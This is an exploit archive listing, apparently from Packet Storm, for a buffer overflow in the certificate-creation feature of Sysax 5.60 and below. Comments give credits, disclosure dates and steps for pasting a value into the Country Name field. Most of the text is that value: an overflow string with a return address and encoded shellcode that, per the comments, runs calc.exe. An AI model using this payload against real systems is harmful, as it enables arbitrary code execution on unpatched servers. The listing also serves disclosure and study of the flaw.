Sysax versions 5.60 and below suffer from a buffer overflow vulnerability when creating an SSL certificate.
25b09a6e92ff4d9c00a80eaae87713ec5fe32db0a7d9c1c488dd9ed1a7a31810#Title: Sysax <= 5.60 Create SSL Certificate Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: Windows XP SP3
#Discovered: May 29, 2012
#Vendor notified: May 30, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-create-ssl-certificate-buffer.html
#Go to Manage Server Settings -> Security Settings Configure -> Create Certificate -> <Paste the value below into the Country Name field>
#You will get an error, click OK and voila, code execution
#calc.exe shell32.ll jmp esp 7cb97475
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAut¹|GGGGGGGGGGGGGGÛÅÙt$ôYIIIICCCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLJHK9S030EPU0MYKUVQ9BE4LKPRVPLK1BTLLKQBUDLKBR184ONWQZ1601KOVQYPNL7LE13LERFLWPIQ8O4MC1O7JBZPQBV7LKF220LKW2GLEQN0LK1P48LE9P2TPJS1XPPPLKW8DXLK0XWPEQ8SKS7L0ILKFTLKUQXV6QKOFQ9PNL9QHO4M5QYW08M03EJTS3SML8WKSMVDT5M2QHLK68Q431HS3VLKDLPKLK0X5L318SLKTDLK5QN0K9PDQ46DQKQK3QQI0ZV1KOKP68QOPZLKB2ZKLFQM2J5QLMMUH930EPUPV0BHVQLK2OK7KOXUOKZPOEY20VU8Y6Z5OMMMKON5GL5VCL5ZMPKKKPT55UOKPG23D2RORJ30QCKO8UBC51RLSSVNBE3H55UPAAGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed